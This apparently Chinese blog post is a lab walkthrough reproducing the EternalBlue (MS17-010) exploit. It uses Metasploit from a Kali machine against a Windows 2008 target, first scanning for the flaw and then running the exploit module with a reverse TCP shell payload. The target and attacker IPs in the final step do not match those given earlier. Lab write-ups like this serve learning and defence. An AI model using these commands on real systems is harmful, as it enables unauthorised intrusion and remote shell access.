永恒之蓝复现

一、实验环境:

  • kali攻击机—IP地址:192.168.85.156
  • Win 2008靶机—IP地址:192.168.85.152

二、实验过程:

1、扫描靶机,查看445端口是否开放;

在这里插入图片描述

2、复现

2.1> 在kali中打开METASPLOIT

打开控制平台:msfconsole平台

在这里插入图片描述2.2> 在msfconsole平台上搜索ms17-010相关模块;

search ms17-010
#搜索auxiliary/scanner/smb/smb_ms17_010 模块,进行利用。
在这里插入图片描述2.3> 利用上述模块,进行漏洞发现;

这个模块就是一个ms17-010漏洞扫描模块,利用它可以检查是否存在永恒之蓝漏洞。

命令:use auxiliary/scanner/smb/smb_ms17_010

在这里插入图片描述2.4> 查看需要配置哪些参数:show option

在这里插入图片描述
有上图可知,只需要配置rhosts这一参数,即目标地址范围或CIDR标识符。

2.5> 设置靶机的IP地址;
命令:set rhosts 192.168.85.152

在这里插入图片描述
2.6> 启动扫描;

命令:exploit

在这里插入图片描述

图中带+号表示该主机存在ms17-010漏洞

3、接下来使用漏洞利用模块来进行获得shell权限;
  • 选择模块 :use exploit/windows/smb/ms17_010_eternalblue
  • 选择payload : set payload generic/shell_reverse_tcp
  • 设置rhost(靶机ip地址): set rhost 192.168.113.137
  • 设置lhost(攻击IP地址): set lhost 192.168.113.128
  • 实施攻击 exploit

在这里插入图片描述最后结果:
在这里插入图片描述成功!!!

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值